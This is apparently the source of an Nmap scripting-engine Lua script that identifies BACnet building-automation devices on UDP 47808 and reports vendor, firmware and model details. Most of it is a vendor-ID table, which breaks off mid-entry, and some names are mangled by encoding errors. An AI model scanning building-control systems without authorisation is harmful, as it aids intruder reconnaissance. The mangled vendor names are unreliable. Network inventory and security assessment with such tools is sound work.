nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal 
unicode = require \"unicode\"\n\ndescription = [[\nDiscovers and enumerates BACNet Devices collects device information based off\nstandard requests. In some cases, devices may not strictly follow the\nspecifications, or may comply with older versions of the specifications, and\nwill result in a BACNET error response. Presence of this error positively\nidentifies the device as a BACNet device, but no enumeration is possible.\n\nNote: Requests and responses are via UDP 47808, ensure scanner will receive UDP\n47808 source and destination responses.\n\nhttp://digitalbond.com\n\n]]\n\n---\n-- @usage\n-- nmap --script bacnet-info -sU -p 47808 <host>\n--\n-- @output\n--47808/udp open bacnet\n--| bacnet-discover:\n--| Vendor ID: BACnet Stack at SourceForge (260)\n--| Vendor Name: BACnet Stack at SourceForge\n--| Instance Number: 260001\n--| Firmware: 0.8.2\n--| Application Software: 1.0\n--| Object Name: SimpleServer\n--| Model Name: GNU\n--| Description: server\n--|_ Location: USA\n--\n-- @xmloutput\n--<elem key=\"Vendor ID\">BACnet Stack at SourceForge (260)</elem>\n--<elem key=\"Vendor Name\">BACnet Stack at SourceForge</elem>\n--<elem key=\"Object-identifier\">260001</elem>\n--<elem key=\"Firmware\">0.8.2</elem>\n--<elem key=\"Application Software\">1.0</elem>\n--<elem key=\"Object Name\">SimpleServer</elem>\n--<elem key=\"Model Name\">GNU</elem>\n--<elem key=\"Description\">server</elem>\n--<elem key=\"Location\">USA</elem>\n\n\n\nauthor = {\"Stephen Hilt\", \"Michael Toecker\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"version\"}\n\n\n--\n-- Function to define the portrule as per nmap standards\n--\n--\n--\n\nportrule = shortport.version_port_or_service(47808, \"bacnet\", {\"udp\",\"tcp\"})\n\n---\n-- Table to look up the Vendor Name based on Vendor ID\n-- Table data from http://www.bacnet.org/VendorID/BACnet%20Vendor%20IDs.htm\n-- Fetched on 9/26/2015\n--\n-- @key vennum Vendor number parsed out of the 
BACNet packet\nlocal vendor_id = {\n [0] = \"ASHRAE\",\n [1] = \"NIST\",\n [2] = \"The Trane Company\",\n [3] = \"McQuay International\",\n [4] = \"PolarSoft\",\n [5] = \"Johnson Controls Inc.\",\n [6] = \"American Auto-Matrix\",\n [7] = \"Siemens Schweiz AG (Formerly: Landis & Staefa Division Europe)\",\n [8] = \"Delta Controls\",\n [9] = \"Siemens Schweiz AG\",\n [10] = \"Schneider Electric\",\n [11] = \"TAC\",\n [12] = \"Orion Analysis Corporation\",\n [13] = \"Teletrol Systems Inc.\",\n [14] = \"Cimetrics Technology\",\n [15] = \"Cornell University\",\n [16] = \"United Technologies Carrier\",\n [17] = \"Honeywell Inc.\",\n [18] = \"Alerton / Honeywell\",\n [19] = \"TAC AB\",\n [20] = \"Hewlett-Packard Company\",\n [21] = \"Dorsette.s Inc.\",\n [22] = \"Siemens Schweiz AG (Formerly: Cerberus AG)\",\n [23] = \"York Controls Group\",\n [24] = \"Automated Logic Corporation\",\n [25] = \"CSI Control Systems International\",\n [26] = \"Phoenix Controls Corporation\",\n [27] = \"Innovex Technologies Inc.\",\n [28] = \"KMC Controls Inc.\",\n [29] = \"Xn Technologies Inc.\",\n [30] = \"Hyundai Information Technology Co. 
Ltd.\",\n [31] = \"Tokimec Inc.\",\n [32] = \"Simplex\",\n [33] = \"North Building Technologies Limited\",\n [34] = \"Notifier\",\n [35] = \"Reliable Controls Corporation\",\n [36] = \"Tridium Inc.\",\n [37] = \"Sierra Monitor Corporation/FieldServer Technologies\",\n [38] = \"Silicon Energy\",\n [39] = \"Kieback & Peter GmbH & Co KG\",\n [40] = \"Anacon Systems Inc.\",\n [41] = \"Systems Controls & Instruments LLC\",\n [42] = \"Lithonia Lighting\",\n [43] = \"Micropower Manufacturing\",\n [44] = \"Matrix Controls\",\n [45] = \"METALAIRE\",\n [46] = \"ESS Engineering\",\n [47] = \"Sphere Systems Pty Ltd.\",\n [48] = \"Walker Technologies Corporation\",\n [49] = \"H I Solutions Inc.\",\n [50] = \"MBS GmbH\",\n [51] = \"SAMSON AG\",\n [52] = \"Badger Meter Inc.\",\n [53] = \"DAIKIN Industries Ltd.\",\n [54] = \"NARA Controls Inc.\",\n [55] = \"Mammoth Inc.\",\n [56] = \"Liebert Corporation\",\n [57] = \"SEMCO Incorporated\",\n [58] = \"Air Monitor Corporation\",\n [59] = \"TRIATEK LLC\",\n [60] = \"NexLight\",\n [61] = \"Multistack\",\n [62] = \"TSI Incorporated\",\n [63] = \"Weather-Rite Inc.\",\n [64] = \"Dunham-Bush\",\n [65] = \"Reliance Electric\",\n [66] = \"LCS Inc.\",\n [67] = \"Regulator Australia PTY Ltd.\",\n [68] = \"Touch-Plate Lighting Controls\",\n [69] = \"Amann GmbH\",\n [70] = \"RLE Technologies\",\n [71] = \"Cardkey Systems\",\n [72] = \"SECOM Co. Ltd.\",\n [73] = \"ABB Geb\u00e4etechnik AG Bereich NetServ\",\n [74] = \"KNX Association cvba\",\n [75] = \"Institute of Electrical Installation Engineers of Japan (IEIEJ)\",\n [76] = \"Nohmi Bosai Ltd.\",\n [77] = \"Carel S.p.A.\",\n [78] = \"AirSense Technology Inc.\",\n [79] = \"Hochiki Corporation\",\n [80] = \"Fr. Sauter AG\",\n [81] = \"Matsushita Electric Works Ltd.\",\n [82] = \"Mitsubishi Electric Corporation Inazawa Works\",\n [83] = \"Mitsubishi Heavy Industries Ltd.\",\n [84] = \"ITT Bell & Gossett\",\n [85] = \"Yamatake Building Systems Co. 
Ltd.\",\n [86] = \"The Watt Stopper Inc.\",\n [87] = \"Aichi Tokei Denki Co. Ltd.\",\n [88] = \"Activation Technologies LLC\",\n [89] = \"Saia-Burgess Controls Ltd.\",\n [90] = \"Hitachi Ltd.\",\n [91] = \"Novar Corp./Trend Control Systems Ltd.\",\n [92] = \"Mitsubishi Electric Lighting Corporation\",\n [93] = \"Argus Control Systems Ltd.\",\n [94] = \"Kyuki Corporation\",\n [95] = \"Richards-Zeta Building Intelligence Inc.\",\n [96] = \"Scientech R&D Inc.\",\n [97] = \"VCI Controls Inc.\",\n [98] = \"Toshiba Corporation\",\n [99] = \"Mitsubishi Electric Corporation Air Conditioning & Refrigeration Systems Works\",\n [100] = \"Custom Mechanical Equipment LLC\",\n [101] = \"ClimateMaster\",\n [102] = \"ICP Panel-Tec Inc.\",\n [103] = \"D-Tek Controls\",\n [104] = \"NEC Engineering Ltd.\",\n [105] = \"PRIVA BV\",\n [106] = \"Meidensha Corporation\",\n [107] = \"JCI Systems Integration Services\",\n [108] = \"Freedom Corporation\",\n [109] = \"Neuberger Geb\u00e4eautomation GmbH\",\n [110] = \"Sitronix\",\n [111] = \"Leviton Manufacturing\",\n [112] = \"Fujitsu Limited\",\n [113] = \"Emerson Network Power\",\n [114] = \"S. A. Armstrong Ltd.\",\n [115] = \"Visonet AG\",\n [116] = \"M&M Systems Inc.\",\n [117] = \"Custom Software Engineering\",\n [118] = \"Nittan Company Limited\",\n [119] = \"Elutions Inc. (Wizcon Systems SAS)\",\n [120] = \"Pacom Systems Pty. Ltd.\",\n [121] = \"Unico Inc.\",\n [122] = \"Ebtron Inc.\",\n [123] = \"Scada Engine\",\n [124] = \"AC Technology Corporation\",\n [125] = \"Eagle Technology\",\n [126] = \"Data Aire Inc.\",\n [127] = \"ABB Inc.\",\n [128] = \"Transbit Sp. z o. o.\",\n [129] = \"Toshiba Carrier Corporation\",\n [130] = \"Shenzhen Junzhi Hi-Tech Co. 
Ltd.\",\n [131] = \"Tokai Soft\",\n [132] = \"Blue Ridge Technologies\",\n [133] = \"Veris Industries\",\n [134] = \"Centaurus Prime\",\n [135] = \"Sand Network Systems\",\n [136] = \"Regulvar Inc.\",\n [137] = \"AFDtek Division of Fastek International Inc.\",\n [138] = \"PowerCold Comfort Air Solutions Inc.\",\n [139] = \"I Controls\",\n [140] = \"Viconics Electronics Inc.\",\n [141] = \"Yaskawa America Inc.\",\n [142] = \"DEOS control systems GmbH\",\n [143] = \"Digitale Mess- und Steuersysteme AG\",\n [144] = \"Fujitsu General Limited\",\n [145] = \"Project Engineering S.r.l.\",\n [146] = \"Sanyo Electric Co. Ltd.\",\n [147] = \"Integrated Information Systems Inc.\",\n [148] = \"Temco Controls Ltd.\",\n [149] = \"Airtek International Inc.\",\n [150] = \"Advantech Corporation\",\n [151] = \"Titan Products Ltd.\",\n [152] = \"Regel Partners\",\n [153] = \"National Environmental Product\",\n [154] = \"Unitec Corporation\",\n [155] = \"Kanden Engineering Company\",\n [156] = \"Messner Geb\u00e4etechnik GmbH\",\n [157] = \"Integrated.CH\",\n [158] = \"Price Industries\",\n [159] = \"SE-Elektronic GmbH\",\n [160] = \"Rockwell Automation\",\n [161] = \"Enflex Corp.\",\n [162] = \"ASI Controls\",\n [163] = \"SysMik GmbH Dresden\",\n [164] = \"HSC Regelungstechnik GmbH\",\n [165] = \"Smart Temp Australia Pty. Ltd.\",\n [166] = \"Cooper Controls\",\n [167] = \"Duksan Mecasys Co. Ltd.\",\n [168] = \"Fuji IT Co. Ltd.\",\n [169] = \"Vacon Plc\",\n [170] = \"Leader Controls\",\n [171] = \"Cylon Controls Ltd.\",\n [172] = \"Compas\",\n [173] = \"Mitsubishi Electric Building Techno-Service Co. Ltd.\",\n [174] = \"Building Control Integrators\",\n [175] = \"ITG Worldwide (M) Sdn Bhd\",\n [176] = \"Lutron Electronics Co. 
Inc.\",\n [178] = \"LOYTEC Electronics GmbH\",\n [179] = \"ProLon\",\n [180] = \"Mega Controls Limited\",\n [181] = \"Micro Control Systems Inc.\",\n [182] = \"Kiyon Inc.\",\n [183] = \"Dust Networks\",\n [184] = \"Advanced Building Automation Systems\",\n [185] = \"Hermos AG\",\n [186] = \"CEZIM\",\n [187] = \"Softing\",\n [188] = \"Lynxspring\",\n [189] = \"Schneider Toshiba Inverter Europe\",\n [190] = \"Danfoss Drives A/S\",\n [191] = \"Eaton Corporation\",\n [192] = \"Matyca S.A.\",\n [193] = \"Botech AB\",\n [194] = \"Noveo Inc.\",\n [195] = \"AMEV\",\n [196] = \"Yokogawa Electric Corporation\",\n [197] = \"GFR Gesellschaft f\u00fcelungstechnik\",\n [198] = \"Exact Logic\",\n [199] = \"Mass Electronics Pty Ltd dba Innotech Control Systems Australia\",\n [200] = \"Kandenko Co. Ltd.\",\n [201] = \"DTF Daten-Technik Fries\",\n [202] = \"Klimasoft Ltd.\",\n [203] = \"Toshiba Schneider Inverter Corporation\",\n [204] = \"Control Applications Ltd.\",\n [205] = \"KDT Systems Co. Ltd.\",\n [206] = \"Onicon Incorporated\",\n [207] = \"Automation Displays Inc.\",\n [208] = \"Control Solutions Inc.\",\n [209] = \"Remsdaq Limited\",\n [210] = \"NTT Facilities Inc.\",\n [211] = \"VIPA GmbH\",\n [212] = \"TSC21 Association of Japan\",\n [213] = \"Strato Automation\",\n [214] = \"HRW Limited\",\n [215] = \"Lighting Control & Design Inc.\",\n [216] = \"Mercy Electronic and Electrical Industries\",\n [217] = \"Samsung SDS Co.Ltd\",\n [218] = \"Impact Facility Solutions Inc.\",\n [219] = \"Aircuity\",\n [220] = \"Control Techniques Ltd.\",\n [221] = \"OpenGeneral Pty. Ltd.\",\n [222] = \"WAGO Kontakttechnik GmbH & Co. KG\",\n [223] = \"Cerus Industrial\",\n [224] = \"Chloride Power Protection Company\",\n [225] = \"Computrols Inc.\",\n [226] = \"Phoenix Contact GmbH & Co. 
KG\",\n [227] = \"Grundfos Management A/S\",\n [228] = \"Ridder Drive Systems\",\n [229] = \"Soft Device SDN BHD\",\n [230] = \"Integrated Control Technology Limited\",\n [231] = \"AIRxpert Systems Inc.\",\n [232] = \"Microtrol Limited\",\n [233] = \"Red Lion Controls\",\n [234] = \"Digital Electronics Corporation\",\n [235] = \"Ennovatis GmbH\",\n [236] = \"Serotonin Software Technologies Inc.\",\n [237] = \"LS Industrial Systems Co. Ltd.\",\n [238] = \"Square D Company\",\n [239] = \"S Squared Innovations Inc.\",\n [240] = \"Aricent Ltd.\",\n [241] = \"EtherMetrics LLC\",\n [242] = \"Industrial Control Communications Inc.\",\n [243] = \"Paragon Controls Inc.\",\n [244] = \"A. O. Smith Corporation\",\n [245] = \"Contemporary Control Systems Inc.\",\n [246] = \"Intesis Software SL\",\n [247] = \"Ingenieurgesellschaft N. Hartleb mbH\",\n [248] = \"Heat-Timer Corporation\",\n [249] = \"Ingrasys Technology Inc.\",\n [250] = \"Costerm Building Automation\",\n [251] = \"WILO SE\",\n [252] = \"Embedia Technologies Corp.\",\n [253] = \"Technilog\",\n [254] = \"HR Controls Ltd. & Co. KG\",\n [255] = \"Lennox International Inc.\",\n [256] = \"RK-Tec Rauchklappen-Steuerungssysteme GmbH & Co. KG\",\n [257] = \"Thermomax Ltd.\",\n [258] = \"ELCON Electronic Control Ltd.\",\n [259] = \"Larmia Control AB\",\n [260] = \"BACnet Stack at SourceForge\",\n [261] = \"G4S Security Services A/S\",\n [262] = \"Exor International S.p.A.\",\n [263] = \"Cristal Controles\",\n [264] = \"Regin AB\",\n [265] = \"Dimension Software Inc.\",\n [266] = \"SynapSense Corporation\",\n [267] = \"Beijing Nantree Electronic Co. Ltd.\",\n [268] = \"Camus Hydronics Ltd.\",\n [269] = \"Kawasaki Heavy Industries Ltd.\",\n [270] = \"Critical Environment Technologies\",\n [271] = \"ILSHIN IBS Co. 
Ltd.\",\n [272] = \"ELESTA Energy Control AG\",\n [273] = \"KROPMAN Installatietechniek\",\n [274] = \"Baldor Electric Company\",\n [275] = \"INGA mbH\",\n [276] = \"GE Consumer & Industrial\",\n [277] = \"Functional Devices Inc.\",\n [278] = \"ESAC\",\n [279] = \"M-System Co. Ltd.\",\n [280] = \"Yokota Co. Ltd.\",\n [281] = \"Hitranse Technology Co.LTD\",\n [282] = \"Federspiel Controls\",\n [283] = \"Kele Inc.\",\n [284] = \"Opera Electronics Inc.\",\n [285] = \"Gentec\",\n [286] = \"Embedded Science Labs LLC\",\n [287] = \"Parker Hannifin Corporation\",\n [288] = \"MaCaPS International Limited\",\n [289] = \"Link4 Corporation\",\n [290] = \"Romutec Steuer-u. Regelsysteme GmbH\",\n [291] = \"Pribusin Inc.\",\n [292] = \"Advantage Controls\",\n [293] = \"Critical Room Control\",\n [294] = \"LEGRAND\",\n [295] = \"Tongdy Control Technology Co. Ltd.\",\n [296] = \"ISSARO Integrierte Systemtechnik\",\n [297] = \"Pro-Dev Industries\",\n [298] = \"DRI-STEEM\",\n [299] = \"Creative Electronic GmbH\",\n [300] = \"Swegon AB\",\n [301] = \"Jan Brachacek\",\n [302] = \"Hitachi Appliances Inc.\",\n [303] = \"Real Time Automation Inc.\",\n [304] = \"ITEC Hankyu-Hanshin Co.\",\n [305] = \"Cyrus E&M Engineering Co. 
Ltd.\",\n [306] = \"Racine Federated Inc.\",\n [307] = \"Cirrascale Corporation\",\n [308] = \"Elesta GmbH Building Automation\",\n [309] = \"Securiton\",\n [310] = \"OSlsoft Inc.\",\n [311] = \"Hanazeder Electronic GmbH\",\n [312] = \"Honeywell Security DeutschlandNovar GmbH\",\n [313] = \"Siemens Energy & Automation Inc.\",\n [314] = \"ETM Professional Control GmbH\",\n [315] = \"Meitav-tec Ltd.\",\n [316] = \"Janitza Electronics GmbH\",\n [317] = \"MKS Nordhausen\",\n [318] = \"De Gier Drive Systems B.V.\",\n [319] = \"Cypress Envirosystems\",\n [320] = \"SMARTron s.r.o.\",\n [321] = \"Verari Systems Inc.\",\n [322] = \"K-W Electronic Service Inc.\",\n [323] = \"ALFA-SMART Energy Management\",\n [324] = \"Telkonet Inc.\",\n [325] = \"Securiton GmbH\",\n [326] = \"Cemtrex Inc.\",\n [327] = \"Performance Technologies Inc.\",\n [328] = \"Xtralis (Aust) Pty Ltd\",\n [329] = \"TROX GmbH\",\n [330] = \"Beijing Hysine Technology Co.Ltd\",\n [331] = \"RCK Controls Inc.\",\n [332] = \"Distech Controls SAS\",\n [333] = \"Novar/Honeywell\",\n [334] = \"The S4 Group Inc.\",\n [335] = \"Schneider Electric\",\n [336] = \"LHA Systems\",\n [337] = \"GHM engineering Group Inc.\",\n [338] = \"Cllimalux S.A.\",\n [339] = \"VAISALA Oyj\",\n [340] = \"COMPLEX (Beijing) TechnologyCo. Ltd.\",\n [341] = \"SCADAmetrics\",\n [342] = \"POWERPEG NSI Limited\",\n [343] = \"BACnet Interoperability Testing Services Inc.\",\n [344] = \"Teco a.s.\",\n [345] = \"Plexus Technology Inc.\",\n [346] = \"Energy Focus Inc.\",\n [347] = \"Powersmiths International Corp.\",\n [348] = \"Nichibei Co. Ltd.\",\n [349] = \"HKC Technology Ltd.\",\n [350] = \"Ovation Networks Inc.\",\n [351] = \"Setra Systems\",\n [352] = \"AVG Automation\",\n [353] = \"ZXC Ltd.\",\n [354] = \"Byte Sphere\",\n [355] = \"Generiton Co. Ltd.\",\n [356] = \"Holter Regelarmaturen GmbH & Co. 
KG\",\n [357] = \"Bedford Instruments LLC\",\n [358] = \"Standair Inc.\",\n [359] = \"WEG Automation - R&D\",\n [360] = \"Prolon Control Systems ApS\",\n [361] = \"Inneasoft\",\n [362] = \"ConneXSoft GmbH\",\n [363] = \"CEAG Notlichtsysteme GmbH\",\n [364] = \"Distech Controls Inc.\",\n [365] = \"Industrial Technology Research Institute\",\n [366] = \"ICONICS Inc.\",\n [367] = \"IQ Controls s.c.\",\n [368] = \"OJ Electronics A/S\",\n [369] = \"Rolbit Ltd.\",\n [370] = \"Synapsys Solutions Ltd.\",\n [371] = \"ACME Engineering Prod. Ltd.\",\n [372] = \"Zener Electric Pty Ltd.\",\n [373] = \"Selectronix Inc.\",\n [374] = \"Gorbet & Banerjee LLC.\",\n [375] = \"IME\",\n [376] = \"Stephen H. Dawson Computer Service\",\n [377] = \"Accutrol LLC\",\n [378] = \"Schneider Elektronik GmbH\",\n [379] = \"Alpha-Inno Tec GmbH\",\n [380] = \"ADMMicro Inc.\",\n [381] = \"Greystone Energy Systems Inc.\",\n [382] = \"CAP Technologie\",\n [383] = \"KeRo Systems\",\n [384] = \"Domat Control System s.r.o.\",\n [385] = \"Efektronics Pty. Ltd.\",\n [386] = \"Hekatron Vertriebs GmbH\",\n [387] = \"Securiton AG\",\n [388] = \"Carlo Gavazzi Controls SpA\",\n [389] = \"Chipkin Automation Systems\",\n [390] = \"Savant Systems LLC\",\n [391] = \"Simmtronic Lighting Controls\",\n [392] = \"Abelko Innovation AB\",\n [393] = \"Seresco Technologies Inc.\",\n [394] = \"IT Watchdogs\",\n [395] = \"Automation Assist Japan Corp.\",\n [396] = \"Thermokon Sensortechnik GmbH\",\n [397] = \"EGauge Systems LLC\",\n [398] = \"Quantum Automation (ASIA) PTE Ltd.\",\n [399] = \"Toshiba Lighting & Technology Corp.\",\n [400] = \"SPIN Engenharia de Automa\u00e7 Ltda.\",\n [401] = \"Logistics Systems & Software Services India PVT. 
Ltd.\",\n [402] = \"Delta Controls Integration Products\",\n [403] = \"Focus Media\",\n [404] = \"LUMEnergi Inc.\",\n [405] = \"Kara Systems\",\n [406] = \"RF Code Inc.\",\n [407] = \"Fatek Automation Corp.\",\n [408] = \"JANDA Software Company LLC\",\n [409] = \"Open System Solutions Limited\",\n [410] = \"Intelec Systems PTY Ltd.\",\n [411] = \"Ecolodgix LLC\",\n [412] = \"Douglas Lighting Controls\",\n [413] = \"iSAtech GmbH\",\n [414] = \"AREAL\",\n [415] = \"Beckhoff Automation GmbH\",\n [416] = \"IPAS GmbH\",\n [417] = \"KE2 Therm Solutions\",\n [418] = \"Base2Products\",\n [419] = \"DTL Controls LLC\",\n [420] = \"INNCOM International Inc.\",\n [421] = \"BTR Netcom GmbH\",\n [422] = \"Greentrol AutomationInc\",\n [423] = \"BELIMO Automation AG\",\n [424] = \"Samsung Heavy Industries CoLtd\",\n [425] = \"Triacta Power Technologies Inc.\",\n [426] = \"Globestar Systems\",\n [427] = \"MLB Advanced MediaLP\",\n [428] = \"SWG Stuckmann Wirtschaftliche Geb\u00e4esysteme GmbH\",\n [429] = \"SensorSwitch\",\n [430] = \"Multitek Power Limited\",\n [431] = \"Aquametro AG\",\n [432] = \"LG Electronics Inc.\",\n [433] = \"Electronic Theatre Controls Inc.\",\n [434] = \"Mitsubishi Electric Corporation Nagoya Works\",\n [435] = \"Delta Electronics Inc.\",\n [436] = \"Elma Kurtalj Ltd.\",\n [437] = \"ADT Fire and Security Sp. 
A.o.o.\",\n [438] = \"Nedap Security Management\",\n [439] = \"ESC Automation Inc.\",\n [440] = \"DSP4YOU Ltd.\",\n [441] = \"GE Sensing and Inspection Technologies\",\n [442] = \"Embedded Systems SIA\",\n [443] = \"BEFEGA GmbH\",\n [444] = \"Baseline Inc.\",\n [445] = \"M2M Systems Integrators\",\n [446] = \"OEMCtrl\",\n [447] = \"Clarkson Controls Limited\",\n [448] = \"Rogerwell Control System Limited\",\n [449] = \"SCL Elements\",\n [450] = \"Hitachi Ltd.\",\n [451] = \"Newron System SA\",\n [452] = \"BEVECO Gebouwautomatisering BV\",\n [453] = \"Streamside Solutions\",\n [454] = \"Yellowstone Soft\",\n [455] = \"Oztech Intelligent Systems Pty Ltd.\",\n [456] = \"Novelan GmbH\",\n [457] = \"Flexim Americas Corporation\",\n [458] = \"ICP DAS Co. Ltd.\",\n [459] = \"CARMA Industries Inc.\",\n [460] = \"Log-One Ltd.\",\n [461] = \"TECO Electric & Machinery Co. Ltd.\",\n [462] = \"ConnectEx Inc.\",\n [463] = \"Turbo DDC S\u00fc\",\n [464] = \"Quatrosense Environmental Ltd.\",\n [465] = \"Fifth Light Technology Ltd.\",\n [466] = \"Scientific Solutions Ltd.\",\n [467] = \"Controller Area Network Solutions (M) Sdn Bhd\",\n [468] = \"RESOL - Elektronische Regelungen GmbH\",\n [469] = \"RPBUS LLC\",\n [470] = \"BRS Sistemas Eletronicos\",\n [471] = \"WindowMaster A/S\",\n [472] = \"Sunlux Technologies Ltd.\",\n [473] = \"Measurlogic\",\n [474] = \"Frimat GmbH\",\n [475] = \"Spirax Sarco\",\n [476] = \"Luxtron\",\n [477] = \"Raypak Inc\",\n [478] = \"Air Monitor Corporation\",\n [479] = \"Regler Och Webbteknik Sverige (ROWS)\",\n [480] = \"Intelligent Lighting Controls Inc.\",\n [481] = \"Sanyo Electric Industry Co.Ltd\",\n [482] = \"E-Mon Energy Monitoring Products\",\n [483] = \"Digital Control Systems\",\n [484] = \"ATI Airtest Technologies Inc.\",\n [485] = \"SCS SA\",\n [486] = \"HMS Industrial Networks AB\",\n [487] = \"Shenzhen Universal Intellisys Co Ltd\",\n [488] = \"EK Intellisys Sdn Bhd\",\n [489] = \"SysCom\",\n [490] = \"Firecom Inc.\",\n [491] = \"ESA 
Elektroschaltanlagen Grimma GmbH\",\n [492] = \"Kumahira Co Ltd\",\n [493] = \"Hotraco\",\n [494] = \"SABO Elektronik GmbH\",\n [495] = \"Equip'Trans\",\n [496] = \"TCS Basys Controls\",\n [497] = \"FlowCon International A/S\",\n [498] = \"ThyssenKrupp Elevator Americas\",\n [499] = \"Abatement Technologies\",\n [500] = \"Continental Control Systems LLC\",\n [501] = \"WISAG Automatisierungstechnik GmbH & Co KG\",\n [502] = \"EasyIO\",\n [503] = \"EAP-Electric GmbH\",\n [504] = \"Hardmeier\",\n [505] = \"Mircom Group of Companies\",\n [506] = \"Quest Controls\",\n [507] = \"MestekInc\",\n [508] = \"Pulse Energy\",\n [509] = \"Tachikawa Corporation\",\n [510] = \"University of Nebraska-Lincoln\",\n [511] = \"Redwood Systems\",\n [512] = \"PASStec Industrie-Elektronik GmbH\",\n [513] = \"NgEK Inc.\",\n [514] = \"FAW Electronics Ltd\",\n [515] = \"Jireh Energy Tech Co. Ltd.\",\n [516] = \"Enlighted Inc.\",\n [517] = \"El-Piast Sp. Z o.o\",\n [518] = \"NetxAutomation Software GmbH\",\n [519] = \"Invertek Drives\",\n [520] = \"Deutschmann Automation GmbH & Co. 
KG\",\n [521] = \"EMU Electronic AG\",\n [522] = \"Phaedrus Limited\",\n [523] = \"Sigmatek GmbH & Co KG\",\n [524] = \"Marlin Controls\",\n [525] = \"CircutorSA\",\n [526] = \"UTC Fire & Security\",\n [527] = \"DENT Instruments Inc.\",\n [528] = \"FHP Manufacturing Company - Bosch Group\",\n [529] = \"GE Intelligent Platforms\",\n [530] = \"Inner Range Pty Ltd\",\n [531] = \"GLAS Energy Technology\",\n [532] = \"MSR-Electronic-GmbH\",\n [533] = \"Energy Control Systems Inc.\",\n [534] = \"EMT Controls\",\n [535] = \"Daintree Networks Inc.\",\n [536] = \"EURO ICC d.o.o\",\n [537] = \"TE Connectivity Energy\",\n [538] = \"GEZE GmbH\",\n [539] = \"NEC Corporation\",\n [540] = \"Ho Cheung International Company Limited\",\n [541] = \"Sharp Manufacturing Systems Corporation\",\n [542] = \"DOT CONTROLS a.s.\",\n [543] = \"BeaconMed\u00e60220\",\n [544] = \"Midea Commercial Aircon\",\n [545] = \"WattMaster Controls\",\n [546] = \"Kamstrup A/S\",\n [547] = \"CA Computer Automation GmbH\",\n [548] = \"Laars Heating Systems Company\",\n [549] = \"Hitachi Systems Ltd.\",\n [550] = \"Fushan AKE Electronic Engineering Co. Ltd.\",\n [551] = \"Toshiba International Corporation\",\n [552] = \"Starman Systems LLC\",\n [553] = \"Samsung Techwin Co. 
Ltd.\",\n [554] = \"ISAS-Integrated Switchgear and Systems P/L\",\n [556] = \"Obvius\",\n [557] = \"Marek Guzik\",\n [558] = \"Vortek Instruments LLC\",\n [559] = \"Universal Lighting Technologies\",\n [560] = \"Myers Power Products Inc.\",\n [561] = \"Vector Controls GmbH\",\n [562] = \"Crestron Electronics Inc.\",\n [563] = \"A&E Controls Limited\",\n [564] = \"Projektomontaza A.D.\",\n [565] = \"Freeaire Refrigeration\",\n [566] = \"Aqua Cooler Pty Limited\",\n [567] = \"Basic Controls\",\n [568] = \"GE Measurement and Control Solutions Advanced Sensors\",\n [569] = \"EQUAL Networks\",\n [570] = \"Millennial Net\",\n [571] = \"APLI Ltd\",\n [572] = \"Electro Industries/GaugeTech\",\n [573] = \"SangMyung University\",\n [574] = \"Coppertree Analytics Inc.\",\n [575] = \"CoreNetiX GmbH\",\n [576] = \"Acutherm\",\n [577] = \"Dr. Riedel Automatisierungstechnik GmbH\",\n [578] = \"Shina System Co.Ltd\",\n [579] = \"Iqapertus\",\n [580] = \"PSE Technology\",\n [581] = \"BA Systems\",\n [582] = \"BTICINO\",\n [583] = \"Monico Inc.\",\n [584] = \"iCue\",\n [585] = \"tekmar Control Systems Ltd.\",\n [586] = \"Control Technology Corporation\",\n [587] = \"GFAE GmbH\",\n [588] = \"BeKa Software GmbH\",\n [589] = \"Isoil Industria SpA\",\n [590] = \"Home Systems Consulting SpA\",\n [591] = \"Socomec\",\n [592] = \"Everex Communications Inc.\",\n [593] = \"Ceiec Electric Technology\",\n [594] = \"Atrila GmbH\",\n [595] = \"WingTechs\",\n [596] = \"Shenzhen Mek Intellisys Pte Ltd.\",\n [597] = \"Nestfield Co. 
Ltd.\",\n [598] = \"Swissphone Telecom AG\",\n [599] = \"PNTECH JSC\",\n [600] = \"Horner APG LLC\",\n [601] = \"PVI Industries LLC\",\n [602] = \"Ela-compil\",\n [603] = \"Pegasus Automation International LLC\",\n [604] = \"Wight Electronic Services Ltd.\",\n [605] = \"Marcom\",\n [606] = \"Exhausto A/S\",\n [607] = \"Dwyer Instruments Inc.\",\n [608] = \"Link GmbH\",\n [609] = \"Oppermann Regelgerate GmbH\",\n [610] = \"NuAire Inc.\",\n [611] = \"Nortec Humidity Inc.\",\n [612] = \"Bigwood Systems Inc.\",\n [613] = \"Enbala Power Networks\",\n [614] = \"Inter Energy Co. Ltd.\",\n [615] = \"ETC\",\n [616] = \"COMELEC S.A.R.L\",\n [617] = \"Pythia Technologies\",\n [618] = \"TrendPoint Systems Inc.\",\n [619] = \"AWEX\",\n [620] = \"Eurevia\",\n [621] = \"Kongsberg E-lon AS\",\n [622] = \"FlaktWoods\",\n [623] = \"E + E Elektronik GES M.B.H.\",\n [624] = \"ARC Informatique\",\n [625] = \"SKIDATA AG\",\n [626] = \"WSW Solutions\",\n [627] = \"Trefon Electronic GmbH\",\n [628] = \"Dongseo System\",\n [629] = \"Kanontec Intelligence Technology Co. Ltd.\",\n [630] = \"EVCO S.p.A.\",\n [631] = \"Accuenergy (CANADA) Inc.\",\n [632] = \"SoftDEL\",\n [633] = \"Orion Energy Systems Inc.\",\n [634] = \"Roboticsware\",\n [635] = \"DOMIQ Sp. z o.o.\",\n [636] = \"Solidyne\",\n [637] = \"Elecsys Corporation\",\n [638] = \"Conditionaire International Pty. 
Limited\",\n [639] = \"Quebec Inc.\",\n [640] = \"Homerun Holdings\",\n [641] = \"RFM Inc.\",\n [642] = \"Comptek\",\n [643] = \"Westco Systems Inc.\",\n [644] = \"Advancis Software & Services GmbH\",\n [645] = \"Intergrid LLC\",\n [646] = \"Markerr Controls Inc.\",\n [647] = \"Toshiba Elevator and Building Systems Corporation\",\n [648] = \"Spectrum Controls Inc.\",\n [649] = \"Mkservice\",\n [650] = \"Fox Thermal Instruments\",\n [651] = \"SyxthSense Ltd\",\n [652] = \"DUHA System S R.O.\",\n [653] = \"NIBE\",\n [654] = \"Melink Corporation\",\n [655] = \"Fritz-Haber-Institut\",\n [656] = \"MTU Onsite Energy GmbHGas Power Systems\",\n [657] = \"Omega Engineering Inc.\",\n [658] = \"Avelon\",\n [659] = \"Ywire Technologies Inc.\",\n [660] = \"M.R. Engineering Co. Ltd.\",\n [661] = \"Lochinvar LLC\",\n [662] = \"Sontay Limited\",\n [663] = \"GRUPA Slawomir Chelminski\",\n [664] = \"Arch Meter 